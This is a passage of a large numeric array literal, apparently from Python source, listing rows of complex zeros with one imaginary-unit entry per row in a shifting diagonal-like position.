0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
